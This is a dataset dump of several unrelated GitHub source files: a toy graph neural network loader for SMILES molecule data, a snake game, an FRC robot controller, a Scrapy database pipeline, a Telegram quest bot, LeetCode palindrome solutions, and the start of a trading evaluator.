0)]\ncharge: [(0, 0), (1, 0), (2, 0), (3, 0), (4, 0), (5, 0)]\nclass: [(0, None), (1, None), (2, None), (3, None), (4, None), (5, None)]\nadj_h:\n [[0.5 0.5 0. 0. 0. 0. ]\n [0.25 0.25 0.5 0. 0. 0. ]\n [0. 0.5 0.25 0.25 0. 0. ]\n [0. 0. 0.33333333 0.33333333 0.33333333 0. ]\n [0. 0. 0. 0.2 0.2 0.6 ]\n [0. 0. 0. 0. 0.75 0.25 ]]\n'''\n\n'''\nQuestion:\nthe expanded feature array is too sparce\n'''\n\ndict_element = {'C': 1, 'N': 2, 'O': 3, 'Br': 4, 'Cl': 5, 'Na': 6, 'S': 7, 'P': 8, 'Ca': 9, 'F': 10, 'B': 11, 'H': 12,\n 'As': 13, 'Al': 14, 'I': 15, 'Si': 16, 'K': 17, 'Cr': 18, 'Zn': 19, 'Se': 20, 'Zr': 21, 'Fe': 22,\n 'Sn': 23, 'Nd': 24, 'Cu': 25, 'Au': 26, 'Pb': 27, 'Tl': 28, 'Sb': 29, 'Cd': 30, 'Pd': 31, 'Ti': 32,\n 'Pt': 33, 'In': 34, 'Ba': 35, 'Ag': 36, 'Dy': 37, 'Hg': 38, 'Li': 39, 'Yb': 40, 'Mn': 41, 'Mg': 42,\n 'Co': 43, 'Ni': 44, 'Be': 45, 'Ge': 46, 'Bi': 47, 'V': 48, 'Sr': 49, 'Mo': 50, 'Ru': 51, 'Eu': 52,\n 'Sc': 53}\n# from test\nMaximum_length_smile = 132\n# Maximum_length = 0\ntmpnum_smiles = 10000\n\ndef fread_smiles(path):\n with open(path, 'r') as f:\n dts = f.read().split('\\n')[1:]\n\n names_to_smiles = {}\n for dt in dts:\n if dt == '':\n continue\n data = dt.split(',')\n names_to_smiles[data[0]] = data[1]\n\n return names_to_smiles\n\ndef fread_labels(path):\n file = open(path, 'r').read()\n data_list = file.split('\\n')[1:]\n return_dict = {}\n for data in data_list:\n if data:\n list_d = data.split(',')\n return_dict[list_d[0]] = int(list_d[1])\n\n return return_dict\n\ndef proc_one_smile(smile_nx):\n element = smile_nx.nodes(data='element')\n isotope = smile_nx.nodes(data='isotope')\n aromatic = smile_nx.nodes(data='aromatic')\n hcount = smile_nx.nodes(data='hcount')\n charge = smile_nx.nodes(data='charge')\n _class = smile_nx.nodes(data='class')\n \n feature = []\n fet_element = []\n fet_aromatic = []\n fet_hcount = []\n fet_charge = []\n for i in element:\n fet_element.append(dict_element[i[1]])\n for i in aromatic:\n if i[1]:\n fet_aromatic.append(1)\n else:\n fet_aromatic.append(0)\n for i in hcount:\n fet_hcount.append(i[1])\n for i in charge:\n fet_charge.append(i[1])\n feature.append(fet_element)\n feature.append(fet_aromatic)\n feature.append(fet_hcount)\n feature.append(fet_charge)\n feature = np.array(feature)\n\n # print(feature.shape)\n # print(feature)\n\n global Maximum_length_smile\n tmp = int(Maximum_length_smile - feature.shape[1])\n expand_feature = np.zeros((4,tmp))\n feature = np.concatenate((feature,expand_feature),axis = 1)\n feature = feature.transpose()\n\n # print(feature.shape)\n # print(feature)\n # print(expand_feature.shape)\n # print(expand_feature)\n # print()\n\n # global Maximum_length\n # if feature.shape[1] > Maximum_length :\n # Maximum_length = feature.shape[1]\n\n # print(feature.shape)\n # print(feature) \n # print('element:',type(element),element)\n # print('aromatic:',type(aromatic),aromatic)\n # print('isotope:',type(isotope),isotope)\n # print('hcount:',type(hcount),hcount)\n # print('charge:',type(charge),charge)\n # print('class:',type(_class),_class)\n\n adj = nx.to_numpy_matrix(smile_nx,weight='order')\n # print(adj.shape)\n \n # print(adj.shape)\n # print(adj)\n # print('adj:',type(adj),'\\n',adj)\n\n adj = adj+np.eye(adj.shape[0])\n # print('adj:',type(adj),'\\n',adj)\n\n sum_ = np.array(np.sum(adj, axis=0)).flatten()\n # print('sum_:',type(sum_),'\\n',sum_)\n row_sum = np.power(np.diag(sum_), -1)\n # print('row_sum:',type(row_sum),'\\n',row_sum)\n row_sum[np.isinf(row_sum)] = 0\n # print('row_sum:',type(row_sum),'\\n',row_sum)\n adj = np.dot(row_sum, adj)\n # print('adj_h:',type(adj_h),'\\n',adj_h)\n\n expand_feature = np.zeros((adj.shape[0],Maximum_length_smile-adj.shape[1]))\n adj = np.concatenate((adj,expand_feature),axis = 1)\n expand_feature = np.zeros((Maximum_length_smile-adj.shape[0],adj.shape[1]))\n adj = np.concatenate((adj,expand_feature),axis = 0)\n\n return adj, feature\n \n\ndef load_data():\n ffolder_train = \"../data/train/\"\n\n fname_smiles = \"names_smiles.txt\"\n fname_onehot = \"names_onehots.npy\"\n fname_label = \"names_labels.txt\"\n\n dict_id_smiles = fread_smiles(ffolder_train+fname_smiles)\n # print(dict_id_smiles)\n smiles = []# smile string, for debug\n id = []# chemical id\n mol_smiles = []# debug\n adj_smiles = []#adjacent\n feature_smiles = []#feature\n allinput = []\n tmpi = 0\n for k in dict_id_smiles:\n # print('smile',dict_id_smiles[k])\n smiles.append(dict_id_smiles[k])\n id.append(k)\n mol_smiles.append(psm.read_smiles(dict_id_smiles[k]))\n tmpadj,tmpfet = proc_one_smile(psm.read_smiles(dict_id_smiles[k]))\n adj_smiles.append(tmpadj)\n feature_smiles.append(tmpfet)\n cat = np.concatenate((tmpadj,tmpfet),axis=1)\n allinput.append(cat)\n tmpi+=1\n if tmpi >= tmpnum_smiles:\n break\n # break\n \n dict_id_label = fread_labels(ffolder_train+fname_label)\n label_list = []\n tmpi = 0\n for k in dict_id_label:\n label_list.append(dict_id_label[k])\n tmpi+=1\n if tmpi >= tmpnum_smiles:\n break\n label_list = np.array(label_list)\n adj_smiles = torch.FloatTensor(np.array(adj_smiles))\n feature_smiles = torch.FloatTensor(np.array(feature_smiles))\n allinput = torch.FloatTensor(np.array(allinput))\n labels = torch.FloatTensor(np.expand_dims(label_list,1))\n print(adj_smiles.shape)\n print(feature_smiles.shape)\n print(labels.shape)\n print(allinput.shape)\n '''\n torch.Size([8169, 132, 132])\n torch.Size([8169, 4, 132])\n torch.Size([8169])\n torch.Size([32, 136, 132])\n '''\n print(feature_smiles.shape[2])\n print(labels.max().item() + 1)\n return id,labels,adj_smiles,feature_smiles,allinput\n\n# load_data()\n'''\ntest data: 610条\n'''\n\ndef load_test_data():\n ffolder_train = \"../data/test/\"\n\n fname_smiles = \"names_smiles.txt\"\n fname_onehot = \"names_onehots.npy\"\n # fname_label = \"names_labels.txt\"\n\n dict_id_smiles = fread_smiles(ffolder_train+fname_smiles)\n # print(dict_id_smiles)\n smiles = []# smile string, for debug\n id = []# chemical id\n mol_smiles = []# debug\n adj_smiles = []#adjacent\n feature_smiles = []#feature\n allinput = []\n tmpi = 0\n for k in dict_id_smiles:\n # print('smile',dict_id_smiles[k])\n smiles.append(dict_id_smiles[k])\n id.append(k)\n mol_smiles.append(psm.read_smiles(dict_id_smiles[k]))\n tmpadj,tmpfet = proc_one_smile(psm.read_smiles(dict_id_smiles[k]))\n adj_smiles.append(tmpadj)\n feature_smiles.append(tmpfet)\n cat = np.concatenate((tmpadj,tmpfet),axis=1)\n allinput.append(cat)\n tmpi+=1\n if tmpi >= tmpnum_smiles:\n break\n # break\n \n adj_smiles = torch.FloatTensor(np.array(adj_smiles))\n feature_smiles = torch.FloatTensor(np.array(feature_smiles))\n allinput = torch.FloatTensor(np.array(allinput))\n print(adj_smiles.shape)\n print(feature_smiles.shape)\n print(allinput.shape)\n \n print(feature_smiles.shape[2])\n return id,adj_smiles,feature_smiles,allinput\n\n# load_test_data()\n\ndef accu(output,l):\n finalact = torch.nn.Sigmoid()\n v = finalact(output)[0].item()\n if l == 1:\n return l-v\n else:\n return v","repo_name":"LittleQili/Toy-GCN","sub_path":"dataproc.py","file_name":"dataproc.py","file_ext":"py","file_size_in_byte":8946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31297973918","text":"from settings import *\nfrom functions import *\nfrom zmeya import Snake\nfrom apple import Apple\nfrom time import sleep\nimport keyboard as kb\nimport msvcrt as m\nimport os\n\nfrom random import choice as chs\nfrom random import randint as rnd\n\nsettings = Settings()\n\nsettings.cells_st = draw_field(\n settings.dwr, settings.cell_size, settings.window_size)\nsettings.cells_num = [len(settings.cells_st[0]), len(settings.cells_st[1])]\n\narr = [Snake(settings) for k in range(30)]\n\napples = [Apple(settings, arr)]\n\n\ndef snake_left():\n if settings.manual_control:\n for snake in arr:\n snake.change_direct(\"W\")\n\n\ndef snake_up():\n if settings.manual_control:\n for snake in arr:\n snake.change_direct(\"N\")\n\n\ndef snake_right():\n if settings.manual_control:\n for snake in arr:\n snake.change_direct(\"E\")\n\n\ndef snake_down():\n if settings.manual_control:\n for snake in arr:\n snake.change_direct(\"S\")\n\n\nkb.add_hotkey('left', snake_left)\nkb.add_hotkey('up', snake_up)\nkb.add_hotkey('right', snake_right)\nkb.add_hotkey('down', snake_down)\n\ncounter = 0\nmax_score = 0\nwhile True:\n counter += 1\n\n for snake in arr:\n if snake.score > max_score:\n max_score = snake.score\n if snake.update(arr, snake):\n arr.remove(snake)\n break\n\n for apple in apples:\n if snake.check_apple_eating(apple):\n snake.inc_tail()\n\n apple.dwr.clear()\n\n apples.remove(apple)\n apples.append(Apple(settings, arr))\n\n snake.draw()\n snake.brain(apples, arr)\n\n if rnd(1, 15) == 3:\n apples.append(Apple(settings, arr))\n\n if rnd(1, 10) == 3 and not settings.manual_control:\n snake.change_direct(chs([\"N\", \"E\", \"S\", \"W\"]))\n\n for apple in apples:\n apple.draw()\n tt.update()\n\n if counter % 10 == 0:\n os.system(\"cls\")\n print(\"\\nSnake num: \", len(arr), \"\\nMax Score: \", max_score)\n counter = 0\n\n sleep(0.05)\n # m.getch()\n\n\ntt.mainloop()\n","repo_name":"TAPAKAHOKOT/Snake-with-stupid-Brain","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4971968744","text":"import wpilib\nimport ctre\nfrom wpilib import interfaces\n\nclass MyRobot(wpilib.TimedRobot):\n def robotInit(self):\n # compressor = wpilib.Compressor(wpilib.PneumaticsModuleType.CTREPCM)\n # compressor.disable()\n\n\n self.back_left = ctre.WPI_TalonFX(0) \n self.front_left = ctre.WPI_TalonFX(1)\n self.front_right = ctre.WPI_TalonFX(2) \n self.back_right = ctre.WPI_TalonFX(3)\n self.shooter_top = ctre.WPI_TalonFX(6)\n self.shooter_bottom = ctre.WPI_TalonFX(7)\n self.shooter_angle_1 = ctre.WPI_TalonSRX(10)\n self.shooter_angle_2 = ctre.WPI_TalonSRX(11) \n self.intake = ctre.WPI_TalonFX(12)\n\n \n self.front_left.setNeutralMode(ctre.NeutralMode.Brake)\n self.front_right.setNeutralMode(ctre.NeutralMode.Brake)\n self.back_left.setNeutralMode(ctre.NeutralMode.Brake)\n self.back_right.setNeutralMode(ctre.NeutralMode.Brake)\n self.front_right.setInverted(True)\n self.back_right.setInverted(True)\n self.shooter_top.setInverted(True)\n self.shooter_angle_1.setInverted(True)\n self.shooter_angle_2.setInverted(True)\n\n #solenoids:\n self.shooter_solenoid = wpilib.DoubleSolenoid(wpilib.PneumaticsModuleType.CTREPCM, forwardChannel = 0, reverseChannel = 1)\n self.shooter_solenoid_timer = wpilib.Timer()\n \n self.climber_solenoid = wpilib.DoubleSolenoid(wpilib.PneumaticsModuleType.CTREPCM, forwardChannel = 4, reverseChannel = 5)\n self.climber_solenoid_previous_position = wpilib.DoubleSolenoid.Value.kReverse\n self.climber_solenoid_timer = wpilib.Timer()\n\n self.intake_solenoid = wpilib.DoubleSolenoid(wpilib.PneumaticsModuleType.CTREPCM, forwardChannel = 2, reverseChannel = 3)\n self.intake_solenoid_previous_position = wpilib.DoubleSolenoid.Value.kForward\n self.intake_solenoid_timer = wpilib.Timer()\n\n #motor controller groups\n self.shooter_angle = wpilib.MotorControllerGroup(self.shooter_angle_1, self.shooter_angle_2)\n self.shooter = wpilib.MotorControllerGroup(self.shooter_top, self.shooter_bottom)\n\n #controller variables\n self.controller = wpilib.XboxController(0)\n self.controllerHID = interfaces.GenericHID(0)\n \n #speed/safety variables\n self.drive_speed = .7\n self.shooter_angle_speed = 1\n self.shooter_speed = .35\n self.is_birb_activated = True\n\n #other variables\n self.hub_shooting = [False, False] #[isHubShooting, isMovingToCorrectAngle]\n self.hub_shooting_timer = wpilib.Timer()\n\n # self.limit_switch = wpilib.DigitalInput(0)\n self.potentiometer = wpilib.AnalogInput(0) #0 degrees: 3512, 90 degrees: 3850\n\n #motor dictionary: (now in robotInit for function support)\n target_position = 0\n motor_position = 0\n previous_position = 0\n\n self.motor_dictionary = {\n \"front_right\": {\n \"motor\": self.front_right,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n \"front_left\": {\n \"motor\": self.front_left,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n\n },\n \"back_right\": {\n \"motor\": self.back_right,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n \"back_left\": {\n \"motor\": self.back_left,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n \"intake\": {\n \"motor\": self.intake,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n \"shooter_angle\": {\n \"motor\": self.shooter_angle,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n \"shooter\": {\n \"motor\": self.shooter,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n }\n\n def teleopPeriodic(self):\n #driving\n if abs(self.controller.getLeftY()) > .3 or abs(self.controller.getLeftX()) > .3 or abs(self.controller.getRightX()) > .3:\n self.front_right.set((-self.controller.getLeftY() - self.controller.getLeftX() - self.controller.getRightX()) * self.drive_speed)\n self.front_left.set((-self.controller.getLeftY() + self.controller.getLeftX() + self.controller.getRightX()) * self.drive_speed)\n self.back_left.set((-self.controller.getLeftY() - self.controller.getLeftX() + self.controller.getRightX()) * self.drive_speed)\n self.back_right.set((-self.controller.getLeftY() + self.controller.getLeftX() - self.controller.getRightX()) * self.drive_speed)\n else:\n self.front_right.set(0)\n self.front_left.set(0)\n self.back_right.set(0)\n self.back_left.set(0)\n \n # if self.controller.getYButtonPressed():\n # if self.drive_speed == 1:\n # self.drive_speed = .4\n # print(\"slow mode\")\n # else:\n # self.drive_speed = 1\n # print(\"FAST MODE\")\n \n\n #shooter angle\n if not self.hub_shooting[0]:\n if self.controller.getRightBumper():\n self.shooter_angle.set(self.shooter_angle_speed)\n elif self.controller.getLeftBumper():\n self.shooter_angle.set(-self.shooter_angle_speed)\n else:\n self.shooter_angle.set(0)\n\n #shooter/intake\n if not self.hub_shooting[0]:\n if self.controller.getRightTriggerAxis() > self.controller.getLeftTriggerAxis():\n self.shooter.set(self.controller.getRightTriggerAxis() * self.shooter_speed)\n self.intake.set(self.controller.getRightTriggerAxis() * self.shooter_speed)\n\n if self.controller.getRightTriggerAxis() < self.controller.getLeftTriggerAxis():\n self.intake.set(self.controller.getLeftTriggerAxis() * -.5)\n self.shooter.set(self.controller.getLeftTriggerAxis() * -.5)\n\n if self.controller.getRightTriggerAxis() == self.controller.getLeftTriggerAxis():\n self.intake.set(0)\n self.shooter_bottom.set(0)\n self.shooter_top.set(0)\n\n #solenoids:\n if self.controller.getAButtonPressed():\n self.shooter_solenoid_timer.start()\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n if self.shooter_solenoid_timer.hasElapsed(.1) and self.shooter_solenoid_timer.get() < .2:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n if self.shooter_solenoid_timer.hasElapsed(.5) and self.shooter_solenoid_timer.get() < .55:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n if self.shooter_solenoid_timer.hasElapsed(.6) and self.shooter_solenoid_timer.get() < .7:\n self.shooter_solenoid_timer.stop()\n self.shooter_solenoid_timer.reset()\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n\n if self.controller.getBButtonPressed() and self.is_birb_activated:\n self.climber_solenoid_timer.start()\n if self.climber_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kForward:\n self.climber_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n self.climber_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kReverse\n if self.climber_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kReverse:\n self.climber_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n self.climber_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kForward\n if self.climber_solenoid_timer.hasElapsed(.25):\n self.climber_solenoid_timer.stop()\n self.climber_solenoid_timer.reset()\n self.climber_solenoid_previous_position = self.climber_solenoid.get()\n self.climber_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n\n if self.controller.getStartButtonPressed():\n self.intake_solenoid_timer.start()\n if self.intake_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kForward:\n self.intake_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n self.intake_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kReverse\n if self.intake_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kReverse:\n self.intake_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n self.intake_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kForward\n if self.intake_solenoid_timer.hasElapsed(.25):\n self.intake_solenoid_timer.stop()\n self.intake_solenoid_timer.reset()\n self.intake_solenoid_previous_position = self.intake_solenoid.get()\n self.intake_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n\n #auto angling/hub shooting\n # print((self.potentiometer.getValue() - 2554) * (90/448))\n\n if self.controller.getXButtonPressed():\n self.hub_shooting = [True, True]\n\n if self.hub_shooting[0]:\n if self.hub_shooting[1]:\n if ((self.potentiometer.getValue() - 2554) * (90/448)) < 55:\n self.shooter_angle.set(1)\n elif ((self.potentiometer.getValue() - 2554) * (90/448)) > 60:\n self.shooter_angle.set(-1)\n else:\n self.shooter_angle.set(0)\n self.hub_shooting_timer.start()\n self.hub_shooting[1] = False\n self.shooter.set(.3)\n\n if self.hub_shooting_timer.hasElapsed(1) and self.hub_shooting_timer.get() < 1.1:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n elif self.hub_shooting_timer.hasElapsed(1.25) and self.hub_shooting_timer.get() < 1.35:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n elif self.hub_shooting_timer.hasElapsed(1.75) and self.hub_shooting_timer.get() < 1.85:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n elif self.hub_shooting_timer.hasElapsed(2) and self.hub_shooting_timer.get() < 2.1:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n elif self.hub_shooting_timer.hasElapsed(2.75) and self.hub_shooting_timer.get() < 2.8:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n elif self.hub_shooting_timer.hasElapsed(2.85) and self.hub_shooting_timer.get() < 2.95:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n elif self.hub_shooting_timer.hasElapsed(2.25) and self.hub_shooting_timer.get() < 2.3:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n elif self.hub_shooting_timer.hasElapsed(2.35) and self.hub_shooting_timer.get() < 2.45:\n self.hub_shooting_timer.reset()\n self.hub_shooting_timer.stop()\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n self.shooter.set(0)\n self.shooter_angle.set(-1)\n if ((self.potentiometer.getValue() - 2554) * (90/448)) < -5 and not self.hub_shooting[1]:\n self.shooter_angle.set(0)\n self.hub_shooting[0] = False\n\n # print(self.hub_shooting_timer.get())\n\n if self.controller.getBackButtonPressed():\n self.shooter.set(0)\n self.shooter_angle.set(0)\n self.hub_shooting[0] = False\n self.hub_shooting_timer.stop()\n self.hub_shooting_timer.reset()\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n\n def autonomousInit(self):\n self.timer = wpilib.Timer()\n self.timer.start()\n self.autonomous_shooting = False\n # #Initial motor values\n self.front_right.set(-.3)\n self.front_left.set(-.3)\n self.back_right.set(-.3)\n self.back_left.set(-.3)\n\n # #intake ejection\n self.intake_solenoid_timer.start()\n self.climber_solenoid_timer.start()\n\n def autonomousPeriodic(self):\n print(self.timer.get())\n #solenoid defaults\n if self.intake_solenoid_timer.get() > 10 and self.intake_solenoid_timer.get() < 10.1:\n self.intake_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n if self.climber_solenoid_timer.get() > 10 and self.climber_solenoid_timer.get() < 10.1:\n self.climber_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n if self.intake_solenoid_timer.get() > 10.25 and self.intake_solenoid_timer.get() < 10.35:\n self.intake_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n self.intake_solenoid_timer.stop()\n self.intake_solenoid_timer.reset()\n if self.climber_solenoid_timer.get() > 10.25 and self.climber_solenoid_timer.get() < 10.35:\n self.climber_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n self.climber_solenoid_timer.stop()\n self.climber_solenoid_timer.reset()\n\n if self.timer.hasElapsed(2):\n self.front_right.set(0)\n self.front_left.set(0)\n self.back_right.set(0)\n self.back_left.set(0)\n # self.autonomous_shooting = True\n # self.timer.reset()\n # if self.autonomous_shooting:\n # if ((self.potentiometer.getValue() - 2554) * (90/448)) < 60:\n # self.shooter_angle.set(1)\n # elif ((self.potentiometer.getValue() - 2554) * (90/448)) > 65:\n # self.shooter_angle.set(-1)\n # else:\n # self.shooter_angle.set(0)\n # self.shooter.setVoltage(5.7)\n # self.timer.start()\n # if self.timer.hasElapsed(1):\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n # if self.timer.hasElapsed(1.25):\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n # if self.timer.hasElapsed(1.75):\n # self.shooter.set(0)\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n # if self.timer.hasElapsed(2):\n # self.autonomous_shooting = False\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n # self.front_right.set(-.2)\n # self.front_left.set(-.2)\n # self.back_right.set(-.2)\n # self.back_left.set(-.2)\n # if self.timer.hasElapsed(3):\n # self.front_right.set(0)\n # self.front_left.set(0)\n # self.back_right.set(0)\n # self.back_left.set(0)\n # self.timer.stop()\n # self.timer.reset()\n # if self.timer.hasElapsed(2.25):\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n # self.shooter.set(0)\n # if self.timer.hasElapsed(2.75):\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n # self.front_right.set(-.3)\n # self.front_left.set(-.3)\n # self.back_right.set(-.3)\n # self.back_left.set(-.3)\n # if self.timer.hasElapsed(3):\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n # if self.timer.hasElapsed(5):\n # self.front_right.set(0)\n # self.front_left.set(0)\n # self.back_right.set(0)\n # self.back_left.set(0)\n \n # self.timer.stop()\n # self.timer.reset()\n\n\nif __name__ == \"__main__\": \n wpilib.run(MyRobot)","repo_name":"Brown-County-FIRST-Robotics/1716-2022-robot","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":16480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37493676072","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n# Scrape data --> Item Containers --> json /csv files\n# Scrape data --> Item Containers --> Pipeline --> SQL/Mongo database\n\n# import sqlite3\nimport mysql.connector\nimport pymongo\n\n\nclass QuotetutorialPipeline(object):\n\n def __init__(self):\n self.create_connection()\n self.create_table()\n self.connect_mongodb()\n\n def create_connection(self):\n # self.conn = sqlite3.connect(\"myquotes.db\")\n self.conn = mysql.connector.connect(host='localhost', user='root', passwd='Ehsan@1371', database='myquotes')\n\n self.curr = self.conn.cursor()\n\n def create_table(self):\n self.curr.execute(\"\"\"DROP TABLE IF EXISTS quotes_tb\"\"\")\n self.curr.execute(\"\"\"create table quotes_tb(\n quote text,\n author text,\n tag text)\"\"\")\n\n # connected to mongodb\n def connect_mongodb(self):\n self.mongo_conn = pymongo.MongoClient('localhost')\n db = self.mongo_conn['myquotes']\n self.collection = db['quotes_tb']\n\n def process_item(self, item, spider):\n # insert into mongodb\n self.collection.insert(dict(item))\n\n self.store_db(item)\n\n print(\"Pipeline:\" + item['quote'][0])\n return item\n\n def store_db(self, item):\n # ? ==> for sqlite3\n # %s ==> for mysql\n\n self.curr.execute(\"\"\"INSERT INTO quotes_tb VALUES (%s,%s,%s)\"\"\", (\n item['quote'][0],\n item['author'][0],\n item['tag'][0]\n ))\n self.conn.commit()\n","repo_name":"Rahi-AI/practice","sub_path":"LearnScrapy/quotetutorial/quotetutorial/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30021964223","text":"from aiogram import types\n\nfrom bot_settings import logging\nfrom send_msg import send_photo, send_text\n\n\nasync def task_location_seven(message: types.Message, key: str) -> None:\n \"\"\"Задание для седьмой локации\"\"\"\n voc = {\n 'st': 'Нет, не верно, попробуй ещё раз',\n 'pl': 'Нет, не он, попробуй ещё раз',\n 'sel': 'Нет, не верно, попробуй ещё раз',\n 'photo': 'Нет, не он, попробуй ещё раз',\n 'waiter': 'Точно! Это официант. Левше удобнее нести поднос в правой '\n 'руке, а расставлять еду и напитки левой, так как ведущая '\n 'рука работает, а другая просто зафиксирована.'\n }\n await send_text(message, voc[key])\n if key == 'waiter':\n await send_text(\n message, 'И вот что нам известно:\\n*В следующей локации нужно '\n 'будет найти последнее ключевое слово* Следуй в *дом Трех Бенуа*, '\n 'по адресу *Каменноостровский проспект 26-28* и найди там *двор '\n '#4*'\n )\n await message.edit_reply_markup()\n\n\nasync def task_location_nine(message: types.Message, key: str) -> None:\n \"\"\"Задание для девятой локации\"\"\"\n voc = {\n 'tamila': 'Нет, это точно не она. Попробуй ещё раз',\n 'jhon': 'Похоже что это не он. Попробуй ещё раз',\n 'kevin': 'Он бы наверно не пошел на такое. Попробуй ещё раз',\n 'bill': 'Да, точно, если перевернуть цифры _7718_ то можно увидеть имя'\n ' перступника - *Билл*.'\n }\n await send_text(message, voc[key])\n if key == 'bill':\n logging.info(f'User {message.chat.id}, {message.chat.username}'\n ' end the quest after location 9')\n await message.edit_reply_markup()\n await send_text(\n message, 'Теперь он от нас не уйдет! Спасибо большое за помощь! '\n 'На этом квест подошел к концу 🥺'\n )\n await send_text(message, 'До новых встреч!')\n await send_photo(\n message, 'https://www.dropbox.com/s/cwhxxsa384prcu1/unnamed.jpg'\n )\n","repo_name":"pashpiter/MisterX_telegram_bot","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71892519201","text":"import math\n# Two pointers\nclass Solution:\n def isPalindrome(self, x: int) -> bool:\n x = str(x)\n left, right = 0, len(x) - 1\n \n while left < right:\n if x[left] != x[right]:\n return False\n left += 1\n right -= 1\n return True\n\n'''\nTime complexity: O(N) with N the number of digit\nTime complexity: O(N)\n'''\nclass Solution:\n def isPalindrome(self, x: int) -> bool:\n if x < 0 or (x % 10 == 0 and x != 0):\n return False\n if x // 10 == 0:\n return True\n exponent = math.floor(math.log10(x))\n\n while x != 0 and exponent > 0:\n power = 10**exponent\n\n if x % 10 != x // power:\n return False\n \n x = (x % power) // 10\n \n exponent -= 2\n return True\n\n'''\nTime complexity: O(N) with N the number of digit\nTime complexity: O(1)\n'''\n\nx = 121\nsol = Solution2().isPalindrome(x)\nprint(sol)","repo_name":"ThibautHurson/LeetCode","sub_path":"9-palindrome_number.py","file_name":"9-palindrome_number.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72113039841","text":"import src.fuzzy as fuzzy\nfrom src.generator import Generator\nfrom datetime import datetime as dt\n\n\nclass Evaluator:\n\n def __init__(self, data, generator=None):\n data_indicator = data.iloc[:, range(9, len(data.columns), 1)]\n if generator is None:\n self._generator = Generator(data_indicator)\n else:\n self._generator = generator\n self._data = data\n\n @property\n def generator(self):\n return self._generator\n\n def CalcBrokerage(self, volume, price):\n BrokerageRate = 0.2\n minFee = 30\n fee = volume * price * BrokerageRate / 100\n if fee < minFee:\n return 30\n else:\n return fee\n\n def trade(self, data, Hold, Money):\n if data['Signal'] > 0: # signal is buy, money must be enough to buy, otherwise can not buy\n if Money > 0:\n buy = round(Money * data['Signal'] / data['High'])\n Hold = Hold + buy\n Money = Money - buy * data['High'] - self.CalcBrokerage(buy, data['High'])\n if data['Signal'] < 0: # signal is sell, hold must be enough to sell, otherwise can not sell\n if Hold > 0: # data['Signal']<0\n sell = -Hold * data['Signal']\n Hold = Hold - sell\n Money = Money + sell * data['Low'] - self.CalcBrokerage(sell, data['Low'])\n fortune = Hold * data['Close'] + Money\n return Hold, Money, fortune\n\n def evaluate(self, ind, filename=\"\"):\n 